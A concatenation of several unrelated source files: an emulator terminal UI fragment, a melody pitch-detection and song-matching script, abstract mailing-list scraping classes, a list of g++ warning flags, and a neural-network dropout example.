root_layout.focus(input_prompt)
computer = machine.CPU()
if "--run-self-test" not in sys.argv:
# load up machine after self-tests done
computer.load_core_dump(datafiles.get("start.sav"))
else:
program = machine.CPU.read_program_from_bin(datafiles.get("challenge.bin"))
computer.load_program(program)
computer.stdout = UIPrinter(output_buffer, output_window)
cmd_history = []
state_stack = []
state_stack.append({
"history": cmd_history.copy(),
"registers": computer.registers.copy(),
"memory": computer.mem.copy()
})
computer.run()
debug_text.buffer.text = "Controls:\n\nType things and hit return.\n\nCtrl+W/S scrolls the output \nwindow.\n\nCtrl-D to quit.\n\nUse \\help to see meta commands."
wrap_output()
root_layout.focus(input_prompt)
app = Application(layout=root_layout, key_bindings=kb, full_screen=True)
app.run()
# if not os.path.exists("./history"):
# os.mkdir("./history")
# hname = f"{datetime.datetime.now().isoformat()}.pickle"
# with open(os.path.join("./history", hname), "wb") as out:
# pickle.dump(state_stack, out)
|
# Based on audio_to_midi_melodia github repo by Justin Salamon <justin.salamon@nyu.edu>
import time
import argparse
import os
import numpy as np
from scipy.signal import medfilt
#import __init__
import pyaudio
import sys
import aubio
from aubio import sink
from songmatch import *
from song import *
from operator import itemgetter
from pprint import PrettyPrinter
pp = PrettyPrinter(indent=4)
#from wavplayer import *
from scipy.io.wavfile import read
def convert_durations(ds):
start_time = ds[0][0]
durations = []
for i,d in enumerate(ds):
if i+1 < len(ds):
durations.append(d[1]-start_time)
return durations
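# Illustrative example (hypothetical timestamps): with ds = [[0.5, 1.0], [1.0, 1.5], [1.5, 2.0]]
# the note-end times are measured from the first note's start and the final entry
# is dropped, so convert_durations(ds) returns [0.5, 1.0].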
# pyaudio params
wf = read('twinkle.wav')[1]
buffer_size = 1024
pyaudio_format = pyaudio.paFloat32
n_channels = 1
samplerate = 44100
seconds_per_sample = buffer_size / samplerate
# setup aubio
tolerance = 0.2
win_s = 4096 # fft size
hop_s = buffer_size # hop size
pitch_o = aubio.pitch("default", win_s, hop_s, samplerate)
pitch_o.set_unit("midi")
pitch_o.set_tolerance(tolerance)
# setup aubio recording (for debugging)
record_output_fn = 'record_output.wav'
g = sink(record_output_fn, samplerate=samplerate)
# pitch detection parameters
thresh_high = 100
thresh_low = 1
start_len = 2
pitch_diff_thresh = 1.5
note_min_len = 5
pitches = [[]]
durations = [[]] # durations = [[t_start, t_end]...]
seq = []
start = True
UDS = False
start_note = None
time_counter = 0 # time recorded so far (in seconds)
keydiff = None
temporatio = None
startpt = None
# song-matcher setup
# songs = {'Twinkle Twinkle Little Star':[0,7,0,2,0,-2,-2,0,-1,0,-2,0,0,0,-2,7,0,-2,0,-1,0,-2,5,0,-2,0,-1,0,-2,-2,0,7,0,2,0,-2,-2,0,-1,0,-2,0,-2],
# 'Three Blind Mice':[-2,-2,4,-2,-2,7,-2,0,-1,3,-2,0,-1,3,5,0,-1,-2,2,1,-5,0,0,5,0,0,-1,-2,2,1,-5,0,0,5,0,0,-1,-2,2,1,-5,0,0,-2,-1,-2,-2,4,-2,-2,4,-2,-2,7,-2,0,-1,3,-2,0,-1,3,5,0,-1,-2,2,1,-5,0,0,5,0,0,-1,-2,2,1,-5,0,0,5,0,0,-1,-2,2,1,-5,0,0,-2,-1,-2,-2]}
# timestamps = {'Twinkle Twinkle Little Star':[0.49991319444444443, 1.0040273401027078, 1.508141485760971, 2.0122556314192344, 2.516369777077498, 3.020483922735761, 4.0287122140522875, 4.532826359710551, 5.036940505368814, 5.541054651027078, 6.04516879668534, 6.297225869514473, 6.549282942343604, 6.801340015172736, 7.0533970880018675, 7.8641806722689065, 8.565739524976657, 9.06985367063492, 9.573967816293184, 10.078081961951447, 10.582196107609711, 11.086310253267973, 12.0945385445845, 12.598652690242764, 13.102766835901026, 13.606880981559291, 14.110995127217553, 14.615109272875818, 15.11922341853408, 16.127451709850607, 16.63156585550887, 17.135680001167135, 17.6397941468254, 18.14390829248366, 18.648022438141922, 19.152136583800186, 20.160364875116713, 20.664479020774976, 21.16859316643324, 21.672707312091504, 22.176821457749767, 22.68093560340803, 23.18504974906629, 23.995833333333337]}
# start_notes = {'Twinkle Twinkle Little Star': 65}
# wav_files = {'Twinkle Twinkle Little Star':'./musicbank/twinkle.wav',
# 'Three Blind Mice': './musicbank/three_blind_mice.wav'}
# song database
allSongNames = ["twinkle","london_bridge","three_blind_mice","boat","lullaby","mary_had_a_little_lamb"]
songdb = SongDatabase(allSongNames)
songdb.preprocessMelodies()
songs = songdb.getAllMelody()
start_notes = songdb.getAllFirstNode()
timestamps = songdb.getAllTimestamps()
# song matcher
song_matcher = SongsMatchNew(songs, timestamps)
# initialise pyaudio
p = pyaudio.PyAudio()
def append_new(l, n, d, tc, note_min_len=5):
if len(l[-1]) <= note_min_len:
l.pop()
d.pop()
else:
l[-1] = np.mean(l[-1])
d[-1].append(tc)
l.append(n)
d.append([tc])
return l, d
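# A small sketch of append_new() (hypothetical pitch values, note_min_len=2):
# append_new([[60.0, 62.0, 58.0]], [64.0], [[1.0]], 1.5, note_min_len=2)
# collapses the finished note to its mean pitch and opens a new one, returning
# ([60.0, [64.0]], [[1.0, 1.5], [1.5]]); a candidate note with fewer than
# note_min_len samples would instead be dropped from both lists.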
def process_audio(in_data, frame_count, time_info, status):
''' callback function for pyaudio'''
global start
global pitches
global seq
global start_note
global time_counter
global durations
global keydiff
global temporatio
global startpt
global wf
time_counter += seconds_per_sample
if wf is not None:
signal = np.array(wf[:frame_count], dtype=np.float32)
if len(signal) < frame_count:
return (in_data, pyaudio.paComplete)
wf = wf[frame_count:]
else:
        signal = np.frombuffer(in_data, dtype=np.float32)
pitch = pitch_o(signal)[0]
confidence = pitch_o.get_confidence()
# process pitch information
if (pitch < thresh_low or pitch > thresh_high) and not start:
start = True
pitches, durations = append_new(pitches, [], durations, time_counter)
if pitch > thresh_low and pitch < thresh_high:
start = False
if len(pitches[-1]) < start_len and abs(pitch - pitches[-1]) > pitch_diff_thresh:
pitches[-1] = [pitch]
durations[-1] = [time_counter] # reset note-start time
else:
if abs(pitch - np.mean(pitches[-1])) > pitch_diff_thresh:
pitches, durations = append_new(pitches, [pitch], durations, time_counter)
else:
pitches[-1].append(pitch)
if not durations[-1]: # if start note
durations[-1] = [time_counter]
# if note ends
if len(pitches) > 2 :
if not seq: # if seq empty
start_note = pitches[-3]
if UDS:
if (pitches[-2] - pitches[-3]) > 1.0:
seq.append("U")
elif abs(pitches[-2] - pitches[-3]) <= 1.0:
seq.append("S")
else:
seq.append("D")
else:
seq.append(int(pitches[-2]-pitches[-3]))
pitches.pop(0)
# add the obtained note to song_matcher to get probability
song_matcher.addNote([seq[-1]])
scores = song_matcher.getProbDic()
#pp.pprint(scores)
        if max(scores.values()) > 0.8: # if confident enough about the song
song = sorted(scores.items(), key=itemgetter(1))[-1][0]
converted_durations = convert_durations(durations)
keydiff, temporatio, startpt = song_matcher.getKeyTempo(song, start_notes[song], start_note, converted_durations)
print("+++++++++++++")
print("key difference: %f" %keydiff)
print("tempo ration: %f" %temporatio)
print("start point: %f" %startpt)
print("song: %s" %song)
print("+++++++++++++")
# WavPlayer(wav_files[song])
# return (in_data, pyaudio.paComplete)
g(signal, hop_s)
return (in_data, pyaudio.paContinue)
# open stream
stream = p.open(format=pyaudio_format,
channels=n_channels,
rate=samplerate,
input=True,
frames_per_buffer=buffer_size,
stream_callback=process_audio)
print("*** starting recording")
stream.start_stream()
while stream.is_active():
try:
time.sleep(0.1)
except KeyboardInterrupt:
print("*** Ctrl+C pressed, exiting")
break
print("*** done recording")
stream.stop_stream()
stream.close()
p.terminate()
print(start_note)
print(durations)
print(seq)
print(keydiff, temporatio, startpt)
# 'london Bridge is Falling Down':'UDDDUUDUUDUUSUDDDUUDUDDUUDDDUUDUUDUUSUDDDUUDUDD',
# 'Lullaby':'SUDSUDUUDDSDDUUDUUDUUDDUUDSUDDUDDUUUDDSUDDUDDUDDSD',
# 'Mary has a little lamb':'DDUUSSDSSUSSDDDUUSSDSUDDUDDUUSSDSSUSSDDDUUSSDSUDD'}
song_matcher = SongsMatchNew(songs)
song_matcher.addNotes(seq)
scores = song_matcher.getProbDic()
print("+++++++++++++++++++++++++++++++")
print(sorted(scores.items(), key=itemgetter(1))[-1][0])
print("+++++++++++++++++++++++++++++++")
|
from tqdm import tqdm
import time
import logging
import os
import email
from abc import ABC, abstractmethod
import mailbox
from mailbox import mboxMessage
from pathlib import Path
from typing import Dict, List, Optional, Tuple, Union
import numpy as np
import pandas as pd
import requests
import yaml
from bs4 import BeautifulSoup
from config.config import CONFIG
from bigbang.utils import get_paths_to_files_in_directory
import bigbang.bigbang_io as bio
from bigbang.data_types import Message, MailList
from bigbang.ingress.utils import (
get_website_content,
get_auth_session,
set_website_preference_for_header,
)
filepath_auth = CONFIG.config_path + "authentication.yaml"
directory_project = str(Path(os.path.abspath(__file__)).parent.parent)
logging.basicConfig(
filename=directory_project + "/abstract.scraping.log",
filemode="w",
level=logging.INFO,
format="%(asctime)s %(message)s",
)
logger = logging.getLogger(__name__)
class AbstractMessageParserWarning(BaseException):
"""Base class for AbstractMessageParser class specific exceptions"""
pass
class AbstractMailListWarning(BaseException):
"""Base class for AbstractMailList class specific exceptions"""
pass
class AbstractMailListDomainWarning(BaseException):
"""Base class for AbstractMailListDomain class specific exceptions"""
pass
class AbstractMessageParser(ABC):
"""
    This class handles the creation of a mailbox.mboxMessage object
    (using the from_*() methods) and its storage in various other file formats
    (using the to_*() methods) that can be saved to local storage.
"""
def __init__(
self,
website=False,
url_login: Optional[str] = None,
url_pref: Optional[str] = None,
login: Optional[Dict[str, str]] = {"username": None, "password": None},
session: Optional[requests.Session] = None,
):
if website:
if (session is None) and (url_login is not None):
session = get_auth_session(url_login, **login)
session = set_website_preference_for_header(url_pref, session)
self.session = session
def create_email_message(
self,
archived_at: str,
body: str,
**header,
) -> Message:
"""
Parameters
----------
archived_at : URL to the Email message.
body : String that contains the body of the message.
header : Dictionary that contains all available header fields of the
message.
"""
msg = email.message.EmailMessage()
if body is not None:
try:
msg.set_content(body) # don't use charset="utf-16"
except Exception:
# UnicodeEncodeError: 'utf-16' codec can't encode character
# '\ud83d' in position 8638: surrogates not allowed
pass
for key, value in header.items():
if "content-type" == key:
msg.set_param("Content-Type", value)
elif "mime-version" == key:
msg.set_param("MIME-Version", value)
elif "content-transfer-encoding" == key:
msg.set_param("Content-Transfer-Encoding", value)
else:
try:
# TODO: find out why it sometimes raises
# email/_header_value_parser.py
# IndexError: list index out of range.
# Also look into UTF-8 encoding.
msg[key] = value
except Exception:
pass
if (
(msg["Message-ID"] is None)
and (msg["Date"] is not None)
and (msg["From"] is not None)
):
msg["Message-ID"] = archived_at.split("/")[-1]
        # convert the `EmailMessage` to `mboxMessage`
mbox_msg = mboxMessage(msg)
mbox_msg.add_header("Archived-At", "<" + archived_at + ">")
return mbox_msg
def from_url(
self,
list_name: str,
url: str,
fields: str = "total",
) -> Message:
"""
Parameters
----------
list_name : The name of the mailing list.
url : URL of this Email
        fields : Indicates whether to return the 'header', the 'body', or
            'total'/both of the Email. The latter is the default.
"""
soup = get_website_content(url, session=self.session)
if soup == "RequestException":
body = "RequestException"
header = self.empty_header
else:
if fields in ["header", "total"]:
header = self._get_header_from_html(soup)
else:
header = self.empty_header
if fields in ["body", "total"]:
body = self._get_body_from_html(list_name, url, soup)
else:
body = None
return self.create_email_message(url, body, **header)
@abstractmethod
def _get_header_from_html(self, soup: BeautifulSoup) -> Dict[str, str]:
pass
@abstractmethod
def _get_body_from_html(
self, list_name: str, url: str, soup: BeautifulSoup
) -> Union[str, None]:
pass
@staticmethod
def to_dict(msg: Message) -> Dict[str, List[str]]:
"""Convert mboxMessage to a Dictionary"""
return bio.email_to_dict(msg)
@staticmethod
def to_pandas_dataframe(msg: Message) -> pd.DataFrame:
"""Convert mboxMessage to a pandas.DataFrame"""
return bio.email_to_pandas_dataframe(msg)
@staticmethod
def to_mbox(msg: Message, filepath: str):
"""
Parameters
----------
msg : The Email.
filepath : Path to file in which the Email will be stored.
"""
return bio.email_to_mbox(msg, filepath)
class AbstractMailList(ABC):
"""
    This class handles the scraping of all public Emails contained in a single
mailing list. To be more precise, each contributor to a mailing list sends
their message to an Email address that has the following structure:
<mailing_list_name>@<mail_list_domain_name>.
    Thus, this class contains all Emails sent to a specific <mailing_list_name>
(the Email localpart).
Parameters
----------
    name : The name of the list (e.g. 3GPP_COMMON_IMS_XFER, IEEESCO-DIFUSION, ...)
    source : Contains the information of the location of the mailing list.
        It can be either a URL where the list is hosted or a path to the file(s).
msgs : List of mboxMessage objects
Methods
-------
from_url()
from_messages()
from_mbox()
get_message_urls()
get_messages_from_url()
get_index_of_elements_in_selection()
get_name_from_url()
to_dict()
to_pandas_dataframe()
to_mbox()
"""
def __init__(
self,
name: str,
source: Union[List[str], str],
msgs: MailList,
):
self.name = name
self.source = source
self.messages = msgs
def __len__(self) -> int:
"""Get number of messsages within the mailing list."""
return len(self.messages)
def __iter__(self):
"""Iterate over each message within the mailing list."""
return iter(self.messages)
def __getitem__(self, index) -> Message:
"""Get specific message at position `index` within the mailing list."""
return self.messages[index]
@classmethod
@abstractmethod
def from_url(
cls,
name: str,
url: str,
select: Optional[dict] = {"fields": "total"},
url_login: Optional[str] = None,
url_pref: Optional[str] = None,
login: Optional[Dict[str, str]] = {"username": None, "password": None},
session: Optional[requests.Session] = None,
) -> "AbstractMailList":
"""
Parameters
----------
name : Name of the mailing list.
url : URL to the mailing list.
select : Selection criteria that can filter messages by:
- content, i.e. header and/or body
- period, i.e. written in a certain year, month, week-of-month
url_login : URL to the 'Log In' page
url_pref : URL to the 'Preferences'/settings page
login : Login credentials (username and password) that were used to set
up AuthSession.
session : requests.Session() object for the Email list domain website.
"""
pass
@classmethod
@abstractmethod
def from_messages(
cls,
name: str,
url: str,
messages: Union[List[str], MailList],
fields: str = "total",
url_login: str = None,
url_pref: str = None,
login: Optional[Dict[str, str]] = {"username": None, "password": None},
session: Optional[str] = None,
) -> "AbstractMailList":
"""
Parameters
----------
name : Name of the list of messages, e.g. 'public-bigdata'
url : URL to the Email list.
messages : Can either be a list of URLs to specific messages
or a list of `mboxMessage` objects.
url_login : URL to the 'Log In' page.
url_pref : URL to the 'Preferences'/settings page.
login : Login credentials (username and password) that were used to set
up AuthSession.
session : requests.Session() object for the Email list domain website.
"""
pass
@classmethod
@abstractmethod
def from_mbox(cls, name: str, filepath: str) -> "AbstractMailList":
"""
Parameters
----------
name : Name of the list of messages, e.g. '3GPP_TSG_SA_WG2_UPCON'.
filepath : Path to file in which mailing list is stored.
"""
pass
@classmethod
@abstractmethod
def get_message_urls(
cls,
name: str,
url: str,
select: Optional[dict] = None,
) -> List[str]:
"""
Parameters
----------
name : Name of the list of messages, e.g. 'public-bigdata'
url : URL to the mailing list.
select : Selection criteria that can filter messages by:
- content, i.e. header and/or body
- period, i.e. written in a certain year and month
Returns
-------
List of all selected URLs of the messages in the mailing list.
"""
pass
@staticmethod
def get_messages_from_urls(
name: str,
msg_urls: list,
msg_parser,
fields: Optional[str] = "total",
) -> MailList:
"""
Generator that returns all messages within a certain period
(e.g. January 2021, Week 5).
Parameters
----------
name : Name of the list of messages, e.g. '3GPP_TSG_SA_WG2_UPCON'
        msg_urls : URLs of the messages to be scraped.
        msg_parser : Parser instance used to create each message from its URL.
fields : Content, i.e. header and/or body
"""
# get all message contents
msgs = []
for msg_url in tqdm(msg_urls, ascii=True, desc=name):
msg = msg_parser.from_url(
list_name=name,
url=msg_url,
fields=fields,
)
if msg.get_payload() == "RequestException":
time.sleep(30)
else:
msgs.append(msg)
logger.info(f"Recorded the message {msg_url}.")
# wait between loading messages, for politeness
time.sleep(1)
return msgs
@staticmethod
def get_index_of_elements_in_selection(
times: List[Union[int, str]],
urls: List[str],
filtr: Union[tuple, list, int, str],
) -> List[int]:
"""
        Filter out messages that were written within a specific period. Period here is a set
containing units of year, month, and week-of-month which can have the following
example elements:
- years: (1992, 2010), [2000, 2008], 2021
- months: ["January", "July"], "November"
- weeks: (1, 4), [1, 5], 2
Parameters
----------
times : A list containing information of the period for each
group of mboxMessage.
urls : Corresponding URLs of each group of mboxMessage of which the
period info is contained in `times`.
filtr : Containing info on what should be filtered.
Returns
-------
        Indices of the elements in `times`/`urls`.
"""
if isinstance(filtr, tuple):
# filter year or week in range
cond = lambda x: (np.min(filtr) <= x <= np.max(filtr))
if isinstance(filtr, list):
# filter in year, week, or month in list
cond = lambda x: x in filtr
if isinstance(filtr, int):
# filter specific year or week
cond = lambda x: x == filtr
if isinstance(filtr, str):
# filter specific month
cond = lambda x: x == filtr
return [idx for idx, time in enumerate(times) if cond(time)]
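    # For example (hypothetical data): times = [2019, 2020, 2021] with
    # filtr = (2020, 2021) yields [1, 2], while filtr = "January" keeps only the
    # entries whose month string matches exactly.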
@abstractmethod
def get_name_from_url(url: str) -> str:
pass
def to_dict(self, include_body: bool = True) -> Dict[str, List[str]]:
"""
Parameters
----------
include_body : A boolean that indicates whether the message body should
be included or not.
Returns
-------
A Dictionary with the first key layer being the header field names and
the "body" key. Each value field is a list containing the respective
header field contents arranged by the order as they were scraped from
the web. This format makes the conversion to a pandas.DataFrame easier.
"""
return bio.mlist_to_dict(self.messages, include_body)
def to_pandas_dataframe(self, include_body: bool = True) -> pd.DataFrame:
"""
Parameters
----------
include_body : A boolean that indicates whether the message body should
be included or not.
Returns
-------
Converts the mailing list into a pandas.DataFrame object in which each
row represents an Email.
"""
return bio.mlist_to_pandas_dataframe(self.messages, include_body)
def to_mbox(self, dir_out: str, filename: Optional[str] = None):
"""Safe mailing list to .mbox files."""
if filename is None:
bio.mlist_to_mbox(self.messages, dir_out, self.name)
else:
bio.mlist_to_mbox(self.messages, dir_out, filename)
class AbstractMailListDomain(ABC):
"""
    This class handles the scraping of all public Emails contained in a mail
    list domain. To be more precise, each contributor to a mailing archive sends
their message to an Email address that has the following structure:
<mailing_list_name>@<mail_list_domain_name>.
    Thus, this class contains all Emails sent to <mail_list_domain_name>
(the Email domain name). These Emails are contained in a list of
`AbstractMailList` types, such that it is known to which <mailing_list_name>
    (the Email localpart) they were sent.
Parameters
----------
name : The mail list domain name (e.g. 3GPP, IEEE, W3C)
url : The URL where the archive lives
lists : A list containing the mailing lists as `AbstractMailList` types
Methods
-------
from_url()
from_mailing_lists()
from_mbox()
get_lists_from_url()
to_dict()
to_pandas_dataframe()
to_mbox()
"""
def __init__(
self, name: str, url: str, lists: List[Union[AbstractMailList, str]]
):
self.name = name
self.url = url
self.lists = lists
def __len__(self):
"""Get number of mailing lists within the mail list domain."""
return len(self.lists)
def __iter__(self):
"""Iterate over each mailing list within the mail list domain."""
return iter(self.lists)
def __getitem__(self, index):
"""Get specific mailing list at position `index` from the mail list domain."""
return self.lists[index]
@classmethod
@abstractmethod
def from_url(
cls,
name: str,
url_root: str,
url_home: Optional[str] = None,
select: Optional[dict] = None,
url_login: Optional[str] = None,
url_pref: Optional[str] = None,
login: Optional[Dict[str, str]] = {"username": None, "password": None},
session: Optional[str] = None,
instant_save: bool = True,
only_mlist_urls: bool = True,
) -> "AbstractMailListDomain":
"""
Create a mail list domain from a given URL.
Parameters
----------
name : Email list domain name, such that multiple instances of
`AbstractMailListDomain` can easily be distinguished.
url_root : The invariant root URL that does not change no matter what
part of the mail list domain we access.
url_home : The 'home' space of the mail list domain. This is required as
it contains the different sections which we obtain using `get_sections()`.
select: Selection criteria that can filter messages by:
- content, i.e. header and/or body
- period, i.e. written in a certain year, month, week-of-month
url_login : URL to the 'Log In' page.
url_pref : URL to the 'Preferences'/settings page.
login : Login credentials (username and password) that were used to set
up AuthSession.
session : requests.Session() object for the mail list domain website.
        instant_save : Boolean giving the choice to save an `AbstractMailList` as
            soon as it is completely scraped or to collect the entire mail list
            domain first. The former is recommended if a large number of mailing
            lists are scraped, which can require a lot of memory and time.
        only_mlist_urls : Boolean giving the choice to collect only `AbstractMailList`
URLs or also their contents.
"""
pass
@classmethod
@abstractmethod
def from_mailing_lists(
cls,
name: str,
url_root: str,
url_mailing_lists: Union[List[str], List[AbstractMailList]],
select: Optional[dict] = None,
url_login: Optional[str] = None,
url_pref: Optional[str] = None,
login: Optional[Dict[str, str]] = {"username": None, "password": None},
session: Optional[str] = None,
only_mlist_urls: bool = True,
instant_save: Optional[bool] = True,
) -> "AbstractMailListDomain":
"""
        Create a mail list domain from a given list of `AbstractMailList` instances
        or URLs pointing to mailing lists.
Parameters
----------
name : mail list domain name, such that multiple instances of
`AbstractMailListDomain` can easily be distinguished.
url_root : The invariant root URL that does not change no matter what
part of the mail list domain we access.
url_mailing_lists : This argument can either be a list of `AbstractMailList`
objects or a list of string containing the URLs to the mailing
list of interest.
url_login : URL to the 'Log In' page.
url_pref : URL to the 'Preferences'/settings page.
login : Login credentials (username and password) that were used to set
up AuthSession.
session : requests.Session() object for the mail list domain website.
        only_mlist_urls : Boolean giving the choice to collect only mailing list
            URLs or also their contents.
        instant_save : Boolean giving the choice to save an `AbstractMailList` as
            soon as it is completely scraped or to collect the entire mail list
            domain first. The former is recommended if a large number of mailing
            lists are scraped, which can require a lot of memory and time.
"""
pass
@classmethod
@abstractmethod
def from_mbox(
cls,
name: str,
directorypath: str,
filedsc: str = "*.mbox",
) -> "AbstractMailListDomain":
"""
Parameters
----------
name : mail list domain name, such that multiple instances of
`AbstractMailListDomain` can easily be distinguished.
directorypath : Path to the folder in which `AbstractMailListDomain` is stored.
filedsc : Optional filter that only reads files matching the description.
By default all files with an mbox extension are read.
"""
pass
@classmethod
@abstractmethod
def get_lists_from_url(
url_root: str,
url_home: str,
select: dict,
session: Optional[str] = None,
instant_save: bool = True,
only_mlist_urls: bool = True,
) -> List[Union[AbstractMailList, str]]:
"""
        Create a dictionary of all lists in the mail list domain.
Parameters
----------
url_root : The invariant root URL that does not change no matter what
part of the mail list domain we access.
url_home : The 'home' space of the mail list domain. This is required as
it contains the different sections which we obtain using `get_sections()`.
select : Selection criteria that can filter messages by:
- content, i.e. header and/or body
- period, i.e. written in a certain year, month, week-of-month
session : requests.Session() object for the mail list domain website.
        instant_save : Boolean giving the choice to save an `AbstractMailList` as
            soon as it is completely scraped or to collect the entire mail list
            domain first. The former is recommended if a large number of mailing
            lists are scraped, which can require a lot of memory and time.
        only_mlist_urls : Boolean giving the choice to collect only `AbstractMailList`
URLs or also their contents.
Returns
-------
archive_dict : the keys are the names of the lists and the value their url
"""
pass
def to_dict(self, include_body: bool = True) -> Dict[str, List[str]]:
"""
Concatenates mailing list dictionaries created using
`AbstractMailList.to_dict()`.
"""
return bio.mlistdom_to_dict(self.lists, include_body)
def to_pandas_dataframe(self, include_body: bool = True) -> pd.DataFrame:
"""
Concatenates mailing list pandas.DataFrames created using
`AbstractMailList.to_pandas_dataframe()`.
"""
return bio.mlistdom_to_pandas_dataframe(self.lists, include_body)
def to_mbox(self, dir_out: str):
"""
Save mail list domain content to .mbox files
"""
bio.mlistdom_to_mbox(self.lists, dir_out + "/" + self.name)
|
# The following g++ options are those that are not enabled by
#
# -Wall -Wextra -Werror -Weffc++
#
# The above options are recommended to be in SConstruct/Makefile, and the options
# below are enabled as much as practical. If a particular option causes
# false-positives in one or a few files, then the issue can be resolved by
# including "gcc_util.h" and surrounding the offending code by
# DISABLE_WARNING(abc) and ENABLE_WARNING(abc) where 'abc' is the name of the
# compiler option without leading '-W'.
#
# Feel free to add comments, per option, as 2nd, 3rd etc. item, or on a line
# above.
#
# NOTE 1: the set of options below is a complete set that complements the above
# options. Therefore, if an option is determined to be not useful, keep it in this
# file commented or add 'no-' after -W, but do not remove it. This way we
# maintain completeness and later might enable those that are commented. Removal
# of them would essentially hide them from future use.
#
# NOTE 2: Some very useful options are available for g++ ver 10 but not for g++
# ver 7; these are commented out and marked with 'N/A'. You can try using a
# newer compiler just for diagnostic purposes, and use the old one for
# building.
#
# Enjoy your clean code!
#
compiler_warnings = [
"-Wall",
"-Wextra",
"-Werror",
#"-Waggregate-return", # not very useful
"-Waligned-new=all",
"-Walloc-zero",
"-Walloca",
#"-Wanalyzer-too-complex", # N/A
#"-Warith-conversion", # N/A
"-Warray-bounds=2",
#"-Wattribute-alias=2", # N/A
"-Wcast-align", # using =strict generates too many warnings
"-Wcast-qual",
#"-Wcatch-value=3", # N/A
#"-Wclass-conversion", # N/A
#"-Wclass-memaccess", # N/A
#"-Wcomma-subscript", # N/A
"-Wcomment",
"-Wconditionally-supported",
#"-Wconversion", # too many cases: {,u}int{32,64}_t are commingled
"-Wconversion-null",
"-Wctor-dtor-privacy",
"-Wno-dangling-else", # too many cases, therefore disabled
"-Wdate-time",
"-Wdelete-incomplete",
"-Wdelete-non-virtual-dtor",
#"-Wdeprecated-copy", # N/A
#"-Wdeprecated-copy-dtor", # N/A
"-Wdisabled-optimization",
#"-Wdouble-promotion", # FOR NOW
#"-Wduplicated-branches", # Useful, but g++ v 7 can give obscure messages
"-Wduplicated-cond",
"-Weffc++",
#"-Wextra-semi", # N/A
#"-Wfloat-conversion", # too many, disable FOR NOW
#"-Wfloat-equal", # there are 3 cases, marked with 'FIXME'.
# Need 'fabs(x-y)<eps' instead
"-Wformat-nonliteral",
"-Wformat-overflow=2",
"-Wformat-security",
"-Wformat-signedness",
"-Wformat-truncation=2",
"-Wformat=2", # if too noisy, use '=1'
"-Wimplicit-fallthrough=5", # use during dev to find issues.
                                # Otherwise fix some auto-generated code
#"-Winaccessible-base", # N/A
"-Winherited-variadic-ctor",
#"-Winit-list-lifetime", # N/A
"-Winit-self",
#"-Winline", # g++ v 7: many false-positives, g++ v 10: OK
"-Winvalid-offsetof",
"-Winvalid-pch",
#"-Wlogical-op", # Useful, but buggy in g++ v 7.
#"-Wmismatched-tags", # N/A
"-Wmissing-declarations",
"-Wmissing-format-attribute",
"-Wmissing-include-dirs",
"-Wmultichar",
#"-Wmultiple-inheritance", # useful to search, not needed in this lib
#"-Wmultiple-inheritance", # useful to search, not needed in this lib
#"-Wnamespaces", # useful to search, not needed in this lib
#"-Wnoexcept", # too many, FOR NOW
"-Wnoexcept-type",
"-Wnon-template-friend",
"-Wnon-virtual-dtor",
"-Wnormalized",
"-Wnormalized=nfkc",
#"-Wnull-dereference", # g++ v 10: OK; g++ v 7: false-positives
"-Wold-style-cast", # too many, need a separe PR to do static_cast<>
"-Woverlength-strings",
"-Woverloaded-virtual",
"-Wpacked",
#"-Wpadded", # useful info when designing packed structs.
# Turn off during dev
#"-Wpedantic # of academic interest
#"-Wpessimizing-move # N/A
"-Wplacement-new=2",
"-Wpmf-conversions",
"-Wpointer-arith",
"-Wredundant-decls", # there a few in generated code,
# so can't edit easily
#"-Wredundant-move", # N/A
#"-Wredundant-tags", # too many of these,
# especially 'struct tm tm;'
"-Wregister",
"-Wreorder",
"-Wscalar-storage-order",
"-Wshadow",
"-Wshift-overflow=2",
#"-Wsign-conversion", # too many of these
#"-Wsign-promo", # too many FOR NOW
"-Wsized-deallocation",
#"-Wstack-protector", # useful for dev, but can gen fales-pos
"-Wstrict-aliasing=3",
"-Wstrict-null-sentinel",
"-Wno-strict-overflow", # g++ v 10 : the =5 gives false-positives,
                            # using =4; g++ v 7: disabled entirely
"-Wstringop-overflow=4",
"-Wsubobject-linkage",
#"-Wsuggest-attribute=cold", # N/A
#"-Wsuggest-attribute=const", # g++ v 7: incorrect diag; g++ v 10 OK
"-Wsuggest-attribute=format",
#"-Wsuggest-attribute=malloc", # N/A
    # The following option suggested marking a template member function that
    # always throws as '[[ noreturn ]]'. Did this, and found the following:
    # when a template specialization for the above template function does
    # not throw unconditionally, it seems the specialization did not return,
    # i.e. the compiler did not provide for the return.
    # So be careful when using this with templates.
    # Non-template functions marked '[[ noreturn ]]' work as expected.
#"-Wsuggest-attribute=noreturn", # useful. Turn on to search for no-return functions.
#"-Wmissing-noreturn", # useful. Turn on to search for no-return functions.
#"-Wsuggest-attribute=pure", # too many (about 100) suggestions
#"-Wsuggest-final-methods", # useful in g++ v 10;
# some false-positives in g++ v 7
#"-Wsuggest-final-types", # some false-positives; useful to enable
# temporarily
"-Wsuggest-override",
#"-Wswitch-default", # useful to for checking, but there is
# generated code that is hard to fix
"-Wswitch-enum",
"-Wsynth",
#"-Wsystem-headers", # of academic interest
#"-Wtemplates", # useful to find template decl in user code
"-Wterminate",
"-Wtrampolines",
"-Wundef",
"-Wunreachable-code",
#"-Wunsafe-loop-optimizations", # g++ v 7: false-positive, g++ v 10: OK.
"-Wunused",
"-Wunused-const-variable=1", # choice =2 complains about unused in the
# same translation unit
"-Wunused-macros",
"-Wuseless-cast",
"-Wvariadic-macros",
"-Wvector-operation-performance",
"-Wvirtual-inheritance",
"-Wvirtual-move-assign",
# "-Wvolatile", # N/A
"-Wwrite-strings",
#"-Wzero-as-null-pointer-constant", # g++ ver 7 treats NULL as zero int,
                                        # it seems; useful in g++ ver 10
]
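# A minimal consumption sketch (hypothetical; the SCons environment 'env' is an
# assumption and not part of this file):
#   env.Append(CXXFLAGS=compiler_warnings)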
|
## Testing matplotlib
## code from NNFS
## My own comments are marked with ##
## My own code start with ##-- and ends with --##
import random
import numpy as np
##--
from matplotlib import pyplot as plt, patches
# --##
from nnfs.datasets import spiral_data
dropout_rate = 0.5
# Example output containing 10 values
example_output = [0.27, -1.03, 0.67, 0.99, 0.05,
-0.37, -2.01, 1.13, -0.07, 0.73]
while True: # repeat as long as necessary
# Randomly choose index and set value to 0
index = random.randint(0, len(example_output) - 1)
example_output[index] = 0
    # We might set an index that is already zeroed
    # There are different ways of overcoming this problem;
    # for simplicity we count the values that are exactly 0
    # while it's extremely rare in a real model that weights are exactly 0, this is not the best method for sure
dropped_out = 0
for value in example_output:
if value == 0:
dropped_out += 1
# If required number of outputs is zeroed - leave the loop
if dropped_out / len(example_output) >= dropout_rate:
break
